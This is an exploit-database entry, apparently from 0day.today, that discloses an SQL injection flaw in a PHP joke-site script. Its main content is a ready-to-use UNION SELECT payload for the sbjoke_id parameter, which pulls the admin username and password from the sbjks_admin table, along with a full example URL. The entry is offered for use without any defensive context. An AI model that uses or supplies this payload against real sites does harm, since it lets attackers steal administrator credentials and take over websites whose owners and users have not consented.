PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability

2010-09-01T00:00:00
ID 1337DAY-ID-13936
Type zdt
Reporter h4ck3r
Modified 2010-09-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================================
PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability
==============================================================

[#] Title:    PHP Joke Site Software (sbjoke_id) SQL Injection Vuln
 
[#] Link:    http://www.softbizscripts.com/jokes-script-features.php
 
[#] Author:    BorN To K!LL - h4ck3r
 
[#] 3xploit:
 
/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--
 
[#] 3xample:
 
http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--
 
[#] Greetings:
 
[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...



#  0day.today [2018-04-03]  #